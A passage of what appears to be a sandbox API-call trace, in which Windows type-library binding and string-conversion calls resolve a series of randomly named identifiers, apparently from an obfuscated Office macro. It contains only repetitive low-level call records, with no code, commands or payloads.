cchWideChar=8 | out: lpWideCharStr="fAGXXX4") returned 8 [0068.896] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.896] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="fAGXXX4", lHashVal=0x107669, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.896] IUnknown:Release (This=0x665ba50) returned 0xd [0068.896] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.896] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="fAGXXX4", lHashVal=0x107669, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.896] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.896] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.896] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="fAGXXX4", lHashVal=0x107669, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.896] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.896] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.896] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="fAGXXX4", lHashVal=0x107669, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.896] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61462, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="fAGXXX4") returned 8 [0068.896] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="fAGXXX4", lHashVal=0x107669, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.896] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.896] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61462 | out: _Dst=0x67c2d40) returned 0x0 [0068.896] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_fAGXXX4") returned 0x106a6c [0068.896] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_fAGXXX4" | out: _Dst="_B_var_fAGXXX4") returned 0x0 [0068.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_fAGXXX4") returned 15 [0068.896] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.896] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_fAGXXX4", lHashVal=0x106a6c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.897] IUnknown:Release (This=0x665ba50) returned 0xd [0068.897] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.897] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_fAGXXX4", lHashVal=0x106a6c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.897] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.897] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.897] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fAGXXX4", lHashVal=0x106a6c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.897] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.897] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.897] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fAGXXX4", lHashVal=0x106a6c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.897] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.897] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.897] IUnknown:Release (This=0x665ba50) returned 0xd [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2f8a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_fAGXXX4") returned 15 [0068.897] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fAGXXX4", lHashVal=0x106a6c, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x58005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x58005800000000, pDummy=0x0) returned 0x0 [0068.897] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61462 | out: _Dst=0x144ec0) returned 0x0 [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6155e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wCUUoAAC") returned 9 [0068.897] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wCUUoAAC", lHashVal=0x10df23, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6155e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wCUUoAAC") returned 9 [0068.897] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wCUUoAAC", lHashVal=0x10df23, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6155e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wCUUoAAC") returned 9 [0068.897] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wCUUoAAC", lHashVal=0x10df23, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.897] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wCUUoAAC") returned 0x10df23 [0068.897] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wCUUoAAC" | out: _Dst="wCUUoAAC") returned 0x0 [0068.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wCUUoAAC") returned 9 [0068.897] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.897] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wCUUoAAC", lHashVal=0x10df23, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.897] IUnknown:Release (This=0x665ba50) returned 0xd [0068.897] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.897] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wCUUoAAC", lHashVal=0x10df23, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.897] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.898] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.898] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wCUUoAAC", lHashVal=0x10df23, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.898] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.898] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.898] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wCUUoAAC", lHashVal=0x10df23, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.898] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6155e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wCUUoAAC") returned 9 [0068.898] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wCUUoAAC", lHashVal=0x10df23, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.898] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.898] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6155e | out: _Dst=0x67c2d40) returned 0x0 [0068.898] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_wCUUoAAC") returned 0x10b6ac [0068.898] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_wCUUoAAC" | out: _Dst="_B_var_wCUUoAAC") returned 0x0 [0068.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_wCUUoAAC") returned 16 [0068.898] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.898] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_wCUUoAAC", lHashVal=0x10b6ac, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.898] IUnknown:Release (This=0x665ba50) returned 0xd [0068.898] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.898] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_wCUUoAAC", lHashVal=0x10b6ac, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.898] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.898] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.898] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_wCUUoAAC", lHashVal=0x10b6ac, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.898] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.898] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.898] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_wCUUoAAC", lHashVal=0x10b6ac, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.898] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.898] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.898] IUnknown:Release (This=0x665ba50) returned 0xd [0068.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2fba, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wCUUoAAC") returned 16 [0068.898] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wCUUoAAC", lHashVal=0x10b6ac, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x6f005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x6f005500000000, pDummy=0x0) returned 0x0 [0068.898] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6155e | out: _Dst=0x144ec0) returned 0x0 [0068.898] ITypeComp:RemoteBind (in: This=0x665ba60, szName="hUxUZAU", lHashVal=0x101311, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61536, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hUxUZAU") returned 8 [0068.898] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="hUxUZAU", lHashVal=0x101311, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61536, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hUxUZAU") returned 8 [0068.899] ITypeComp:RemoteBind (in: This=0x665bd30, szName="hUxUZAU", lHashVal=0x101311, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.899] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hUxUZAU") returned 0x101311 [0068.899] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="hUxUZAU" | out: _Dst="hUxUZAU") returned 0x0 [0068.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="hUxUZAU") returned 8 [0068.899] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.899] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="hUxUZAU", lHashVal=0x101311, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.899] IUnknown:Release (This=0x665ba50) returned 0xd [0068.899] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.899] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="hUxUZAU", lHashVal=0x101311, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.899] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.899] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.899] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="hUxUZAU", lHashVal=0x101311, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.899] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.899] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.899] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="hUxUZAU", lHashVal=0x101311, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.899] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61536, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="hUxUZAU") returned 8 [0068.899] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="hUxUZAU", lHashVal=0x101311, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.899] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.899] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61536 | out: _Dst=0x67c2d40) returned 0x0 [0068.899] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_hUxUZAU") returned 0x101695 [0068.899] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_hUxUZAU" | out: _Dst="_B_var_hUxUZAU") returned 0x0 [0068.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_hUxUZAU") returned 15 [0068.899] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.899] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_hUxUZAU", lHashVal=0x101695, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.899] IUnknown:Release (This=0x665ba50) returned 0xd [0068.899] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.899] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_hUxUZAU", lHashVal=0x101695, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.899] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.899] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.899] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_hUxUZAU", lHashVal=0x101695, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.899] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.899] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.899] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_hUxUZAU", lHashVal=0x101695, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.899] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.899] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.899] IUnknown:Release (This=0x665ba50) returned 0xd [0068.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2fea, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_hUxUZAU") returned 15 [0068.900] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_hUxUZAU", lHashVal=0x101695, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x5a005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x5a005500000000, pDummy=0x0) returned 0x0 [0068.900] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a61536 | out: _Dst=0x144ec0) returned 0x0 [0068.900] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EwQQ1Z", lHashVal=0x10575c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6158a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="EwQQ1Z") returned 7 [0068.900] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EwQQ1Z", lHashVal=0x10575c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6158a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="EwQQ1Z") returned 7 [0068.900] ITypeComp:RemoteBind (in: This=0x665bd30, szName="EwQQ1Z", lHashVal=0x10575c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.900] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EwQQ1Z") returned 0x10575c [0068.900] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="EwQQ1Z" | out: _Dst="EwQQ1Z") returned 0x0 [0068.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="EwQQ1Z") returned 7 [0068.900] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.900] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="EwQQ1Z", lHashVal=0x10575c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.900] IUnknown:Release (This=0x665ba50) returned 0xd [0068.900] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.900] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="EwQQ1Z", lHashVal=0x10575c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.900] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.900] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.900] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="EwQQ1Z", lHashVal=0x10575c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.900] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.900] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.900] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="EwQQ1Z", lHashVal=0x10575c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.900] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6158a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="EwQQ1Z") returned 7 [0068.900] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EwQQ1Z", lHashVal=0x10575c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.900] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.900] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6158a | out: _Dst=0x67c2d40) returned 0x0 [0068.900] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_EwQQ1Z") returned 0x10d205 [0068.900] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_EwQQ1Z" | out: _Dst="_B_var_EwQQ1Z") returned 0x0 [0068.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_EwQQ1Z") returned 14 [0068.901] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.901] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_EwQQ1Z", lHashVal=0x10d205, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.901] IUnknown:Release (This=0x665ba50) returned 0xd [0068.901] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.901] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_EwQQ1Z", lHashVal=0x10d205, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.901] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.901] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.901] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_EwQQ1Z", lHashVal=0x10d205, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.901] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.901] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.901] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_EwQQ1Z", lHashVal=0x10d205, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.901] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.901] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b10000 [0068.901] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.901] IUnknown:Release (This=0x665ba50) returned 0xd [0068.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1001e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_EwQQ1Z") returned 14 [0068.901] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_EwQQ1Z", lHashVal=0x10d205, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x31005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x45005f00720061, ppTypeComp=0x31005100000000, pDummy=0x0) returned 0x0 [0068.902] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6158a | out: _Dst=0x144ec0) returned 0x0 [0068.902] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZkBQAA", lHashVal=0x105bef, wFlags=0x3, ppTInfo=0x144cf8, 